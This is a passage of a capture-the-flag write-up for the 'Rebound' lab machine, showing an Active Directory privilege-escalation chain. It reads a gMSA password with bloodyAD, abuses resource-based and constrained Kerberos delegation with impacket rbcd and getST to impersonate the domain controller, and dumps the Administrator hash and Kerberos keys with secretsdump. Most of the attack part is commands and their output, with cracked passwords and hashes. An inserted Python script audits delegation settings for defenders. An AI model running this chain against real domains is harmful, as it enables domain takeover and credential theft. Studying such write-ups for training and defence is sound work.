000dec4cf9ef2d2a48c6c2af0bea86ea62183c13f07d827c4a1ebcfecd25e1a2f800a00100000000000000000000000000000000000090000000000000000000000


Cracking it with rockyou, we get the password 543BOMBOMBUNmanda.

Looking back at bloodhound, we see that user tbrady has ReadGMSAPassword over DELEGATOR$.

This means we can read DELEGATOR$'s managed password, and hence its NTLM hash, via the msDS-ManagedPassword attribute.

┌──(kali㉿kali)-[~/…/CTF/Boxes/Rebound/gMSADumper]
└─$  bloodyAD -d rebound.htb -u tbrady -p '543BOMBOMBUNmanda' --host dc01.rebound.htb get object 'delegator$' --attr msDS-ManagedPassword

distinguishedName: CN=delegator,CN=Managed Service Accounts,DC=rebound,DC=htb
msDS-ManagedPassword.NTLM: aad3b435b51404eeaad3b435b51404ee:177ae2598e4f659488b6cd0a237df1fc
msDS-ManagedPassword.B64ENCODED: lYA9ZPQxWkDehiHAljsucRRnh5N0HqwjJlbAqxWzhzsH3SGikzaR6F+rMpbBQqpDZBkktx2va1e+xSr+6a1jZrAupT3pvoKoV+Uja9ag0U4iavTkEtZKylKCStup68owRI9pkKsXzn+Dcz8K6fs80d2AHPNE6EWaLMakVbu7l49PqYQ8bltyjO71cEoDH7UcnJbqNwoXksbsFwMWK/Q0pL3TLQ2Ems8Ex2ng+ao9fYEPd79THKR13LwkwowzOYXF3THskJPmfUcSnibo5uvqnZXcjLczpsJSixShdooHHgjrxOweFu8GAGSfdS/nNBou1mqcq2RFQ4sDA/bhFuqJ6Q==

The name of the account suggests something regarding delegation. To enumerate the delegation properties of the DELEGATOR$ account, we use PowerView's Get-NetComputer and filter the properties.

PS C:\Users\winrm_svc\Documents> Get-NetComputer delegator | Select-Object -ExpandProperty msds-allowedtodelegateto | fl
http/dc01.rebound.htb 

We see that DELEGATOR$ has the msds-allowedtodelegateto property set for the service http/dc01.rebound.htb.

However, from our BloodHound output, the Administrator account cannot be delegated.

With reference to this, RBCD (Resource-based Constrained Delegation) can be used to bypass this restriction. To perform the attack, we need two things, which we already have:

  1. An account with an SPN: the ldap_monitor user fits the requirement.

  2. An account with the capability to edit the msDS-AllowedToActOnBehalfOfOtherIdentity attribute of another object.

Using impacket's rbcd, we can exploit this by appending ldap_monitor to the msDS-AllowedToActOnBehalfOfOtherIdentity attribute of DELEGATOR$.

┌──(kali㉿kali)-[~/Desktop/CTF/Boxes/Rebound]
└─$ impacket-rbcd  'rebound.htb/delegator$' -delegate-to 'delegator$' -delegate-from ldap_monitor -use-ldaps -action write -k -no-pass
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[*] Accounts allowed to act on behalf of other identity:
[*]     ldap_monitor   (S-1-5-21-4078382237-1492182817-2568127209-7681)
[*] ldap_monitor can already impersonate users on delegator$ via S4U2Proxy
[*] Not modifying the delegation rights.
[*] Accounts allowed to act on behalf of other identity:
[*]     ldap_monitor   (S-1-5-21-4078382237-1492182817-2568127209-7681)

We can now obtain a ticket via the delegation operation.

┌──(kali㉿kali)-[~/Desktop/CTF/Boxes/Rebound]
└─$ impacket-getST -spn "browser/dc01.rebound.htb" -impersonate "dc01$" "rebound.htb/ldap_monitor" -k -no-pass -dc-ip 10.10.11.231
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[*] Impersonating dc01$
[*] 	Requesting S4U2self
[*] 	Requesting S4U2Proxy
[*] Saving ticket in dc01$.ccache

Once the ticket is obtained, it can be used in an S4U2proxy request, made by DELEGATOR$ on behalf of the impersonated user, to obtain access to one of the services DELEGATOR$ can delegate to.

┌──(kali㉿kali)-[~/Desktop/CTF/Boxes/Rebound]
└─$ impacket-getST -spn "http/dc01.rebound.htb" -impersonate "dc01$" -additional-ticket "dc01$.ccache" "rebound.htb/delegator$" -hashes aad3b435b51404eeaad3b435b51404ee:177ae2598e4f659488b6cd0a237df1fc -k -no-pass -dc-ip 10.10.11.231
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[*] Getting TGT for user
[*] Impersonating dc01$
[*] 	Using additional ticket dc01$.ccache instead of S4U2Self
[*] 	Requesting S4U2Proxy
[*] Saving ticket in dc01$.ccache
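From the defender's side, the three steps above only work because of a specific combination of attributes. The following audit is an added example (not code from impacket, BloodHound or bloodyAD) over constructed account records reflecting what the writeup shows: it reports constrained delegation to a DC service, RBCD entries that chain into it, and high-value users lacking the NOT_DELEGATED flag. ldap_monitor's SPN string is a placeholder, since the writeup only shows that the account has one.

```python
"""Audit Kerberos delegation settings for chains that end at a domain controller.

Added example for this writeup; not code from impacket, BloodHound or bloodyAD.
The account records are constructed from what the writeup shows (DELEGATOR$'s
msDS-AllowedToDelegateTo, the ldap_monitor entry in its
msDS-AllowedToActOnBehalfOfOtherIdentity, Administrator being non-delegatable);
ldap_monitor's SPN is a placeholder, and the flag values are the documented
userAccountControl bits.
"""
UF_NORMAL_ACCOUNT = 0x00000200
UF_WORKSTATION_TRUST_ACCOUNT = 0x00001000
UF_SERVER_TRUST_ACCOUNT = 0x00002000            # domain controller computer account
UF_TRUSTED_FOR_DELEGATION = 0x00080000          # unconstrained delegation
UF_NOT_DELEGATED = 0x00100000                   # "account is sensitive and cannot be delegated"
UF_TRUSTED_TO_AUTH_FOR_DELEGATION = 0x01000000  # constrained delegation with protocol transition

DC_HOSTS = {"dc01.rebound.htb"}
HIGH_VALUE_USERS = {"Administrator"}


def account(uac, spn=(), delegate_to=(), rbcd=(), protected_users=False):
    """One constructed account record; rbcd = principals in msDS-AllowedToActOnBehalfOfOtherIdentity."""
    return {"uac": uac, "spn": list(spn), "delegate_to": list(delegate_to),
            "rbcd": list(rbcd), "protected_users": protected_users}


ACCOUNTS = {                                                                          # constructed
    "Administrator": account(UF_NORMAL_ACCOUNT | UF_NOT_DELEGATED),
    "dc01$": account(UF_SERVER_TRUST_ACCOUNT | UF_TRUSTED_FOR_DELEGATION, spn=["http/dc01.rebound.htb"]),
    "delegator$": account(UF_WORKSTATION_TRUST_ACCOUNT, spn=["browser/dc01.rebound.htb"],
                          delegate_to=["http/dc01.rebound.htb"], rbcd=["ldap_monitor"]),
    "ldap_monitor": account(UF_NORMAL_ACCOUNT, spn=["ldap_monitor/placeholder.rebound.htb"]),  # placeholder SPN
    "winrm_svc": account(UF_NORMAL_ACCOUNT),
}


def spn_host(spn):
    """'http/dc01.rebound.htb:8080' -> 'dc01.rebound.htb'."""
    return spn.split("/", 1)[1].split(":")[0].lower() if "/" in spn else ""


def delegation_chains(accounts, dc_hosts=DC_HOSTS):
    """Return (trustee, middle, dc_spn) triples: `trustee` is listed in `middle`'s RBCD
    attribute and holds an SPN, and `middle` is allowed to delegate to a DC service."""
    chains = []
    for middle, acct in accounts.items():
        dc_targets = [s for s in acct["delegate_to"] if spn_host(s) in dc_hosts]
        for trustee in acct["rbcd"]:
            t = accounts.get(trustee)
            if t is None or not t["spn"]:   # without an SPN the trustee cannot be issued service tickets
                continue
            chains.extend((trustee, middle, spn) for spn in dc_targets)
    return chains


def audit(accounts, dc_hosts=DC_HOSTS):
    """Return human-readable findings with the remediation a defender would apply."""
    findings = []
    for name, acct in accounts.items():
        uac = acct["uac"]
        if uac & UF_TRUSTED_FOR_DELEGATION and not uac & UF_SERVER_TRUST_ACCOUNT:
            findings.append(f"{name}: unconstrained delegation enabled; switch to constrained or remove")
        if uac & UF_TRUSTED_TO_AUTH_FOR_DELEGATION:
            findings.append(f"{name}: protocol transition enabled; any unprotected user can be impersonated")
        for spn in acct["delegate_to"]:
            if spn_host(spn) in dc_hosts:
                findings.append(f"{name}: msDS-AllowedToDelegateTo contains DC service {spn}; remove it")
        if name in HIGH_VALUE_USERS and not (uac & UF_NOT_DELEGATED or acct["protected_users"]):
            findings.append(f"{name}: not marked NOT_DELEGATED and not in Protected Users")
    for trustee, middle, spn in delegation_chains(accounts, dc_hosts):
        findings.append(f"{trustee} -> {middle} -> {spn}: RBCD entry on {middle} chains into a DC service; "
                        f"remove {trustee} from {middle}'s msDS-AllowedToActOnBehalfOfOtherIdentity")
    return findings


if __name__ == "__main__":
    for line in audit(ACCOUNTS):
        print(line)
```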

Finally, we can get the Administrator hash via secretsdump.

┌──(kali㉿kali)-[~/Desktop/CTF/Boxes/Rebound]
└─$ impacket-secretsdump  -k dc01.rebound.htb -just-dc-user administrator -dc-ip 10.10.11.231 -debug
Impacket v0.11.0 - Copyright 2023 Fortra

[+] Impacket Library Installation Path: /home/kali/.pyenv/versions/3.9.16/lib/python3.9/site-packages/impacket
[+] Using Kerberos Cache: dc01$.ccache
[+] Domain retrieved from CCache: rebound.htb
[+] SPN CIFS/DC01.REBOUND.HTB@REBOUND.HTB not found in cache
[+] AnySPN is True, looking for another suitable SPN
[+] Returning cached credential for HTTP/DC01.REBOUND.HTB@REBOUND.HTB
[+] Using TGS from cache
[+] Changing sname from http/dc01.rebound.htb@REBOUND.HTB to CIFS/DC01.REBOUND.HTB@REBOUND.HTB and hoping for the best
[+] Username retrieved from CCache: dc01$
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
[+] Calling DRSCrackNames for administrator 
[+] Calling DRSGetNCChanges for {37857665-6e2e-4f12-9976-5c9babcd8282} 
[+] Entering NTDSHashes.__decryptHash
[+] Decrypting hash for user: CN=Administrator,CN=Users,DC=rebound,DC=htb
Administrator:500:aad3b435b51404eeaad3b435b51404ee:176be138594933bb67db3b2572fc91b8:::
[+] Leaving NTDSHashes.__decryptHash
[+] Entering NTDSHashes.__decryptSupplementalInfo
[+] Leaving NTDSHashes.__decryptSupplementalInfo
[+] Finished processing and printing user's hashes, now printing supplemental information
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:32fd2c37d71def86d7687c95c62395ffcbeaf13045d1779d6c0b95b056d5adb1
Administrator:aes128-cts-hmac-sha1-96:efc20229b67e032cba60e05a6c21431f
Administrator:des-cbc-md5:ad8ac2a825fe1080
[*] Cleaning up...